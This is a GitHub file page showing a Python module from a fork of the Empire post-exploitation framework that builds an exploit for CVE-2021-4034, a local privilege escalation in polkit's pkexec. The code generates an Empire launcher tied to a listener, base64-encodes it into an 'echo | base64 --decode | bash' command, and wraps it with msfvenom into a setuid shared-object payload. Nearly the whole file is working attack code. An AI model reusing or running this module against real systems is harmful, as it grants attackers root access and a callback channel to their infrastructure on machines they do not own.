forked from EmpireProject/Empire
-
-
Notifications
You must be signed in to change notification settings - Fork 580
/
CVE-2021-4034.py
49 lines (40 loc) · 1.6 KB
/
CVE-2021-4034.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
import base64
import subprocess
from empire.server.common.empire import MainMenu
from empire.server.core.module_models import EmpireModule
from empire.server.utils.module_util import handle_error_message
class Module:
@staticmethod
def generate(
main_menu: MainMenu,
module: EmpireModule,
params: dict,
obfuscate: bool = False,
obfuscation_command: str = "",
):
# extract all of our options
listener_name = params["Listener"]
user_agent = params["UserAgent"]
safe_checks = params["SafeChecks"]
# read in the common module source code
script, err = main_menu.modulesv2.get_module_source(
module_name=module.script_path,
obfuscate=obfuscate,
obfuscate_command=obfuscation_command,
)
# generate the launcher code
launcher = main_menu.stagers.generate_launcher(
listener_name,
language="python",
userAgent=user_agent,
safeChecks=safe_checks,
)
if launcher == "":
return handle_error_message("[!] Error in launcher command generation.")
base64_launcher = base64.b64encode(launcher.encode("UTF-8")).decode("UTF-8")
launcher = f'echo \\"{base64_launcher}\\" | base64 --decode | bash'
command = f"msfvenom -p linux/x64/exec CMD='{launcher}' -f elf-so PrependSetuid=true | base64"
output = subprocess.check_output(command, shell=True)
output = output.replace(b"\n", b"")
script = script.replace("{{ payload }}", output.decode("UTF-8"))
return script